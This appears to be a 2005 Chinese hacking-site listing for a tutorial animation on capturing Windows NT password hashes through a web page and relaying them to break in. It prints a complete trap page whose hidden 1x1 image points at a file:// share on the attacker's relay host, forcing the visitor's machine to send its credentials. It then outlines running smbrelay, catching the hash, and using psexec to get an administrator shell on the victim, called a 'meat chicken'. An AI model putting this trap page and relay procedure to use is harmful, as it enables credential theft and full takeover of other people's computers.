利用网页截取得NT密码散列直接入侵

首页新闻文章软件动画编程设计视频搜黑网址网校博客论坛邮箱最近更新

	漏洞公布病毒公告业界动态黑客新闻黑客人物杀毒防护安全书籍升级补丁
	入侵检测漏洞研究软件评测操作系统技巧知识网管天地黑客编程 Q Q 技巧安全防护
	扫描检测远程监控脚本注入拒绝攻击嗅探监听木马后门字典代理密码破解 Q Q 软件
	Q Q 动画木马教程脚本入侵漏洞利用加密破解软件应用安全配置综合教程
	Delphi编程汇编编程 VB编程 VC/C++编程 PB编程 VFP编程 WEB编程 Exploite 数据库编程

48小时热门阅读排行

48小时热门下载排行

安全中国首页 > 动画中心 > 漏洞利用

利用网页截取得NT密码散列直接入侵

动画大小：

492 KB

添加时间：

2005-12-10

动画性质：

无声演示

录制工具：

Sdemo-Player

作者姓名：

雪莲蓬

作者 Q Q：

不详

作者信箱：

不详

动画评级：

动画介绍：使用工具：smbrelay.exe psexec.exe

本机ip: 192.168.0.5

肉鸡ip: 192.168.0.3

陷阱页面代码：

<html><head>
<title>Flash</title>
<table border=0 width=100% height=460>
<tr>
<td width=100% bgcolor=#FFFFFF height=395>
<p align=center>
<OBJECT classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://active.macromedia.com/flash2/cabs/swflash.cab#version=4,0 ,0,0 WIDTH=546 HEIGHT=372>
<PARAM NAME=movie VALUE=111.SWF>
<PARAM NAME=quality VALUE=high>
<embed src=111.SWF loop=false menu=false quality=high WIDTH=400 HEIGHT=300 TYPE=application/x-shockwave-flash PLUGINSPAGE=http://www.macromedia.com/shockwave/download/index.cgi?P1_Pro d_Version=ShockwaveFlash>
</OBJECT></p></td></tr>
<tr><img src="file://192.168.0.2/A.JPG" height=1 width=1 >
<td width=100% bgcolor=#FFFF9C height=48>
</td></tr></table><head></html>
陷阱页面关键句子

现在使用smbrelay.exe绑定ip 192.168.0.2

从肉鸡上访问本机页面

ok!! smbrelay抓到散列!

现在通过192.168.0.2与目标建立连接

用psexec.exe来得到一个shell

ok!!来看看权限！

很好！超级用户！这样就创建了！

下载地址：

高速下载